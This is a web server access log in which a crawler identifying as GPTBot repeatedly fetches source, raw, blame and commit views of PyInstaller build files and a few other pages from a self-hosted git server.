(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9908] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73535] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10938] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:44:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10939] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 6151] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod03_ctypes.pyc" -[17/Feb/2026:14:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10906] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:44:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 10907] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10895] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs" -[17/Feb/2026:14:44:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 10936] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:14:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9901] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21830] [Gzip 12.75] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14322] [Gzip 8.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9901] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9900] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9890] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:14:44:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9929] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73527] [Gzip 20.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 73560] [Gzip 20.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 14291] [Gzip 8.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21787] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11026] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:14:44:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 1624] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod04_pywin32.pyc" -[17/Feb/2026:14:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 21794] [Gzip 12.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 4858] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:46 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 10939] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10925] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:44:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 32204] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/pyimod02_importers.pyc" -[17/Feb/2026:14:44:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" [Client 74.7.227.38] [Length 305] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" -[17/Feb/2026:14:44:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 10894] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs" -[17/Feb/2026:14:44:49 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/%7Bitem.href%7D" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c.diff" -[17/Feb/2026:14:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fapp.js.good" [Client 74.7.227.38] [Length 29149] [Gzip 8.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/app.js.good" -[17/Feb/2026:14:44:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2fmain.py.good" [Client 74.7.227.38] [Length 28731] [Gzip 7.77] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/main.py.good" -[17/Feb/2026:14:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/forgot_password" [Client 74.7.227.38] [Length 4114] [Gzip 2.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/user/login" -[17/Feb/2026:14:44:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47?files=.TemporaryDocument%2findex.html" [Client 74.7.227.38] [Length 24093] [Gzip 6.64] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/.TemporaryDocument/index.html" -[17/Feb/2026:14:44:52 +0000] - 404 404 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/assets/js/i18n.js" [Client 74.7.227.38] [Length 11] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a.diff" -[17/Feb/2026:14:44:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 9928] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/pyimod01_archive.pyc" -[17/Feb/2026:14:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 11050] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" -[17/Feb/2026:14:44:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" [Client 74.7.227.38] [Length 9919] [Gzip 2.86] 